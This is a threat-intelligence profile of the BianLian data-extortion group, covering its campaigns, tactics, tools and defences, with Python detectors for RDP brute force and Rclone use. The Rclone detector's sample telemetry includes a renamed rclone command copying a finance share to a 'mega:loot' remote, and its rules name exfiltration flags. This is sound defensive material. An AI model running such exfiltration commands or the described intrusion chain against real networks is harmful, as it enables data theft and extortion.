Background
BianLian ransomware emerged in mid-2022, initially following the conventional ransomware playbook of encrypting victim data and demanding payment for decryption. A significant operational pivot occurred in January 2023 when Avast released a free decryptor for BianLian's encryption scheme; a public decryptor typically signals a flaw or key-recovery weakness in the ransomware's cryptographic implementation. In response, BianLian pivoted almost entirely to exfiltration-only extortion: rather than encrypting data, the group focuses on stealing sensitive data and threatening to publish it unless a ransom is paid.
This exfiltration-only model offers operational advantages for the attacker: it eliminates the need for a functional encryption/decryption pipeline, reduces noise on victim systems (no mass file encryption event triggering EDR alerts), and can generate equivalent ransom pressure through the threat of data exposure alone. It is particularly effective against healthcare and legal sector victims, where data privacy obligations create strong incentives to pay.
BianLian is assessed to be a Russia-based threat group, based on operational patterns, language artifacts in code, and targeting preferences that avoid Commonwealth of Independent States (CIS) countries. The group likely comprises experienced ransomware operators with backgrounds in the broader Russian cybercrime ecosystem. CISA, the FBI, and the Australian Signals Directorate (ASD) issued a joint advisory in May 2023 warning critical infrastructure operators about BianLian's evolving extortion tactics.
Notable Campaigns
Retirement Living and Elderly Care Targeting (2022-2023) — BianLian specifically targeted assisted living facilities, retirement communities, and elderly care organizations. The targeting of organizations serving vulnerable populations was noted in CISA's advisory as an aggravating factor, with stolen data including medical records, financial information, and personally identifiable information of elderly individuals, who face disproportionate harm from identity theft.
Air Canada Breach (2023) — BianLian claimed responsibility for an attack against Air Canada, Canada's largest airline, asserting that it had obtained 210 gigabytes of data including technical, operational, and employee information. Air Canada acknowledged unauthorized access while disputing the scope of the claimed data theft.
Healthcare Sector Sustained Targeting (2022-2024) — BianLian conducted numerous attacks against U.S. healthcare organizations including hospitals, physician practices, and healthcare technology companies. Healthcare targets are particularly susceptible to exfiltration-only extortion due to HIPAA breach notification requirements and the sensitive nature of medical records.
Australian Financial Services (2023-2024) — The Australian Signals Directorate specifically highlighted BianLian's targeting of Australian financial services and professional services firms. Several Australian organizations reported BianLian incidents involving exfiltration of client financial records and internal business data.
Tactics, Techniques & Procedures
RDP and VPN Credential Compromise — BianLian's primary initial access vector is the use of compromised Remote Desktop Protocol credentials obtained through brute force, credential stuffing, or purchased initial access (T1133, T1078). The group maintains access for extended reconnaissance periods before acting, sometimes remaining on networks for weeks before initiating exfiltration.
Go-Based Custom Backdoor — BianLian deploys a custom Go-based backdoor for persistent access, using TCP reverse shells and SOCKS5 proxies for C2. Go's cross-compilation support allows the same code base to be deployed across Windows and Linux environments. ProxyChains routes traffic through multiple proxy layers to conceal attacker infrastructure.
Exfiltration-Only Extortion Model — Rather than encrypting data, BianLian uses Rclone and similar tools to exfiltrate large volumes of sensitive data to attacker-controlled infrastructure (T1048, T1567.002). The group publishes victim names on its Tor leak site, threatening to release increasingly sensitive data tranches to create escalating pressure. Partial data releases (publishing some data while threatening more) are used as a negotiating tactic.
Long Dwell Time Reconnaissance — BianLian typically spends significant time (days to weeks) mapping victim networks before acting. The group uses SoftPerfect Network Scanner for network discovery and Mimikatz for credential harvesting, and identifies backup systems, file servers, and data repositories before beginning exfiltration. This thorough reconnaissance enables highly targeted data theft focused on the most sensitive and valuable organizational data.
Tools & Malware
- BianLian Go Backdoor — A custom Go-compiled backdoor providing TCP reverse shell access, SOCKS5 proxy capability, and file transfer. Uses encrypted communications and can be compiled for multiple operating systems. Provides persistent C2 independent of the initially compromised credentials.
- Ngrok — A legitimate tunneling service used to expose internal systems and services through encrypted tunnels, facilitating access to internal systems without direct inbound connections.
- Rclone — The primary data exfiltration tool, configured to upload stolen data to attacker-controlled storage. Executed with configuration files dropped to temporary locations.
- SoftPerfect Network Scanner — Commercial network scanning tool used for internal network discovery, service enumeration, and target identification.
- ProxyChains — Linux command-line tool used to route traffic through multiple proxy servers, obscuring attacker IP addresses during operations.
- PsExec — Legitimate Sysinternals tool used for remote command execution and lateral movement across Windows networks.
- PuTTY — SSH client used for Linux system access and tunneling during lateral movement operations.
- AnyDesk — Legitimate remote access software installed for persistent interactive access to key compromised systems.
Indicators & Detection
RDP Exposure Reduction — BianLian's primary initial access vector is RDP. Eliminate direct RDP exposure to the internet entirely; place RDP behind a VPN with MFA. Monitor all RDP authentication for brute force patterns (multiple failures from one source followed by a success). Implement account lockout policies for RDP. Use RDP gateways to centralize and audit all RDP access.
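The "multiple failures followed by success" pattern above, as an added example that is not part of the original advisory: a sliding-window correlation over constructed Windows Security events (4625 = failed logon, 4624 = successful logon, LogonType 10 = RemoteInteractive, i.e. RDP). The event layout, threshold and window are assumptions chosen for the example.

```python
"""Detect RDP brute-force-then-success: >= threshold failed logons (4625)
from one source address inside a time window, followed by a successful
RDP logon (4624, LogonType 10) from that same source."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events (not real logs), flattened from the Security log.
EVENTS = [
    {"time": "2023-05-01T02:00:00", "id": 4625, "src": "203.0.113.5", "user": "admin", "logon_type": 10},
    {"time": "2023-05-01T02:00:04", "id": 4625, "src": "203.0.113.5", "user": "administrator", "logon_type": 10},
    {"time": "2023-05-01T02:00:09", "id": 4625, "src": "203.0.113.5", "user": "backup", "logon_type": 10},
    {"time": "2023-05-01T02:00:15", "id": 4625, "src": "203.0.113.5", "user": "svc_rdp", "logon_type": 10},
    {"time": "2023-05-01T02:00:21", "id": 4625, "src": "203.0.113.5", "user": "jsmith", "logon_type": 10},
    {"time": "2023-05-01T02:00:30", "id": 4624, "src": "203.0.113.5", "user": "jsmith", "logon_type": 10},
    # Benign: one mistyped password from the LAN, then success; must not alert.
    {"time": "2023-05-01T08:15:00", "id": 4625, "src": "10.0.0.12", "user": "aturner", "logon_type": 10},
    {"time": "2023-05-01T08:15:07", "id": 4624, "src": "10.0.0.12", "user": "aturner", "logon_type": 10},
    # Network logon (type 3) is not RDP and is ignored by this rule.
    {"time": "2023-05-01T09:00:00", "id": 4624, "src": "203.0.113.9", "user": "svc", "logon_type": 3},
]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=10)):
    """Return (source, user, failure_count) for each RDP success that was
    preceded by at least `threshold` RDP failures from the same source
    within `window`. Events are processed in timestamp order."""
    failures = defaultdict(deque)  # src -> timestamps of recent 4625 events
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        q = failures[ev["src"]]
        # Expire failures that have fallen out of the sliding window.
        while q and t - q[0] > window:
            q.popleft()
        if ev["id"] == 4625 and ev["logon_type"] == 10:
            q.append(t)
        elif ev["id"] == 4624 and ev["logon_type"] == 10:
            if len(q) >= threshold:
                alerts.append((ev["src"], ev["user"], len(q)))
                q.clear()  # one alert per burst, not one per later success
    return alerts


if __name__ == "__main__":
    for src, user, n in detect_rdp_bruteforce(EVENTS):
        print(f"ALERT: {n} failed RDP logons from {src}, then success as {user}")
```

Tuning the threshold and window against the environment's normal failure rate is what keeps the single-typo case below the alert line.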
Go Malware Detection — BianLian's Go backdoor can be detected through signatures for Go-compiled binaries that establish persistent outbound TCP connections. Monitor for processes establishing long-lived TCP connections to external IPs on non-standard ports. Go binary artifacts in temporary directories, or in paths mimicking system utilities, indicate potential BianLian deployment.
Exfiltration Monitoring — Implement data loss prevention controls that monitor for large-scale file access and transfer patterns. Alert on Rclone execution and configuration file creation. Monitor for bulk access to file shares containing sensitive data (medical records, financial data, legal documents) from systems that do not normally access those locations. Cloud egress monitoring should flag large data uploads to cloud storage providers.
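The "alert on Rclone execution and configuration file creation" point above, as an added example not taken from the advisory or from any vendor product: because Rclone is routinely renamed, the rule keys on the command-line shape (rclone subcommand plus rclone-specific flags and a remote:path argument) rather than the image name alone, and separately flags an rclone.conf dropped into a temporary or public directory. The Sysmon-style event layout and sample paths are constructed assumptions.

```python
"""Flag Rclone exfiltration tooling in process-creation and file-creation
telemetry, including a renamed rclone binary.  Constructed sample events."""
import re

# Constructed Sysmon-style telemetry: event 1 = process create, 11 = file create.
EVENTS = [
    {"event": 1, "host": "FS01",
     "cmdline": r"C:\Windows\Temp\svchost.exe copy \\FS01\Finance mega:loot --config C:\Windows\Temp\rc.conf --transfers 16"},
    {"event": 11, "host": "FS01", "path": r"C:\Users\Public\rclone.conf"},
    {"event": 1, "host": "WS22",
     "cmdline": r"C:\Tools\rclone.exe sync D:\Backups gdrive:backup --config C:\ProgramData\rclone\rclone.conf"},
    {"event": 1, "host": "WS07", "cmdline": r"robocopy D:\Data E:\Archive /MIR"},
    {"event": 11, "host": "WS07", "path": r"C:\Users\aturner\Documents\notes.txt"},
]

SUBCOMMANDS = {"copy", "sync", "move", "copyto", "lsd", "ls", "lsjson"}
FLAGS = {"--config", "--transfers", "--bwlimit", "--checkers", "--no-check-certificate"}
# rclone remote syntax "name:path"; requiring 2+ chars before ':' and no
# following slash excludes Windows drive letters (C:\...) and URLs (https://).
REMOTE_RE = re.compile(r"(?<![\w\\])[A-Za-z0-9_-]{2,}:(?![\\/])")
STAGING_DIRS = (r"\windows\temp", r"\users\public", r"\appdata\local\temp")


def classify_process(cmdline):
    """Return the reasons a process command line looks like rclone ([] if none)."""
    argv = cmdline.split()
    image = argv[0].rsplit("\\", 1)[-1].lower()
    reasons = []
    if "rclone" in image:
        reasons.append("image named rclone")
    if len(argv) > 1 and argv[1].lower() in SUBCOMMANDS:
        if any(a.split("=")[0] in FLAGS for a in argv[2:]):
            reasons.append("rclone subcommand with rclone-specific flag")
        if any(REMOTE_RE.search(a) for a in argv[2:]):
            reasons.append("rclone remote:path argument")
    return reasons


def classify_file(path):
    """Flag an rclone.conf written to a staging directory rather than an install path."""
    p = path.lower()
    if p.endswith("rclone.conf") and any(d in p for d in STAGING_DIRS):
        return ["rclone.conf written to a temp or public directory"]
    return []


def detect(events):
    """Return (host, event_id, reasons) for every event that matched a rule."""
    alerts = []
    for ev in events:
        reasons = classify_process(ev["cmdline"]) if ev["event"] == 1 else classify_file(ev["path"])
        if reasons:
            alerts.append((ev["host"], ev["event"], "; ".join(reasons)))
    return alerts
```

Correlating a process hit with a config-file hit on the same host, as FS01 shows here, is the higher-confidence signal; either alone is worth a triage ticket.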
Breach Notification Preparedness — Given BianLian's targeting of sectors with mandatory breach notification requirements (healthcare, finance), organizations should maintain current data maps identifying where sensitive data resides, develop breach notification procedures, and identify legal counsel and breach notification service providers in advance of incidents. Early preparation significantly reduces the legal and regulatory pressure that drives ransom payment.